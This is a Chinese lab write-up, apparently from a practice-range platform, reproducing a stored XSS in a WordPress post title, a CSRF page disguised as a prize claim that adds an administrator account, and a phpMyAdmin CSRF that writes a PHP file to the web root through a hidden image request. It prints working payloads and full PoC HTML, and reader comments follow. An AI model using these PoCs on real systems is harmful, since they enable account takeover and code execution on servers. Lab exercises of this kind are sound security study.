以下复现均在封神台
内的靶场中完成,欢迎各位小伙伴前去玩耍。
进入到wp的后台页面
选择add new板块,可见在编辑器的Add Title中,后台未对用户输入进行妥善的过滤或者正确转码,导致看到文章的用户都受到恶意代码的影响。
payload:
"><img src=1 onerror=alert("xss")>
复现过程:
点击右上角”Publish”发布后,进入博客主页,出现弹窗:
进一步的利用此处不详述。
打开页面
访问构造好的恶意页面:
点击领取后,新管理员被添加。
使用新管理员登陆,可见能够成功登陆:
poc(需手动修改靶场域名):
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>恭喜你中奖啦</title>
</head>
<body>
<center> <img src="http://5b0988e595225.cdn.sohucs.com/images/20181224/19d726af92e848b69690d786a5390f66.jpeg"/></center>
<form action="此处为靶场域名?m=admin&c=admin&a=add" method="POST" id="transfer" name="transfer">
<input type="hidden" name="username" value="test">
<input type="hidden" name="email" value="test@test.com">
<input type="hidden" name="password" value="passwd">
<input type="hidden" name="repassword" value="passwd">
<input type="hidden" name="role_id" value="1">
<input type="hidden" name="submit3" value="添加">
<center><button type="submit" value="Submit">进入领取</button></center>
</form>
</body>
</html>
此实验最好使用火狐浏览器进行复现,因为Chrome自带站点隔离的安全机制,对该漏洞复现有一定的影响。
进入phpmyadmin管理页面,需登录
该版本pma存在CSRF漏洞,攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。因为我们扮演的便是管理员角色,所以直接访问本地构造好的恶意页面(下方给出POC):
根据我们在poc中设定好的文件写入位置(目前只赋权给了poc中地址),访问php文件:
可见成功运行了恶意代码,写入了测试文件。
poc:
<p>Hello World</p>
<img src="此处为pma靶场网址/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/usr/share/nginx/html/[自定义名称,谨防重复].php';" style="display:none;" />
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
Tkb
发表于 2020-10-22
你所在的用户组无权查看该题目。
评论列表
加载数据中...
voctor
发表于 2020-10-30
大佬牛逼!!!带带弟弟
评论列表
加载数据中...
和谐文明
发表于 2020-12-3
????????flag 是啥??
评论列表
加载数据中...